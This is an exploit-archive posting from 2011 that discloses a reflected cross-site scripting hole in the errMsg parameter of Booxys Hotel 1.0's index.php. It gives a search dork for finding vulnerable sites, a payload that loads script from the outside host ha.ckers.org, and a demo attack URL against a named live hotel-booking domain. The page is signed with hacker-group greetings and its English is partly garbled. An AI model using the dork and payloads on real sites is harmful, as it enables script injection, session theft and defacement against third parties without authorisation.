Booxys Hotel 1.0 Cross Site Scripting



EKU-ID: 480 CVE: OSVDB-ID:
Author: Net.Edit0r Published: 2011-06-10 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


#(+)Exploit Title: booxys Hotel [index.php] Cross site scripting Vulnerability
#(+)Author   : Net.Edit0r
#(+)Software Link : http://www.booxys.com/
#(+) E-mail  : Black.hat.tm@Gmail.com & Net.Edit0r@att.net
#(+) dork    : inurl:"index.php?errMsg="
#(+) Versian : [1.0]
#(+) Category : Web Apps [XSS]
#(+) Platform : Tested on: linux

____________________________________________________________________
____________________________________________________________________

The security problem in the file "index.php" has been created. You
can disable this security problem Plagn take it away.

[~] Vulnerable File :

#      [+]http://localhost.com/de/index.php?errMsg=[XSS]

[~] Cross-site scripting Vulnerability

#      [+]/de/index.php?errMsg=[XSS]

#      [+]http://localhost.com/de/index.php?errMsg=<SCRIPT/XSS
SRC="http://ha.ckers.org/xss.js"></SCRIPT>

[~] Demo :

http://www.hotel-board.com/de/index.php?errMsg=<script>alert(1);</script>

____________________________________________________________________
____________________________________________________________________

########################################################################
(+)IRANIAN Young HackerZ # Persian Gulf
(+)#BHG Member : & DarkCoder & p3nt3st3r & H3x & 3H34N & D3adly
(+)Sp My Best Friend : HUrr!c4nE ~ b3hz4d ~ M4hd1 ~  Mikili ~ 4min
(+)Gr33ts to : Black-Hg.Org ~ Pentesters.ir & All Iranian HackerZ
########################################################################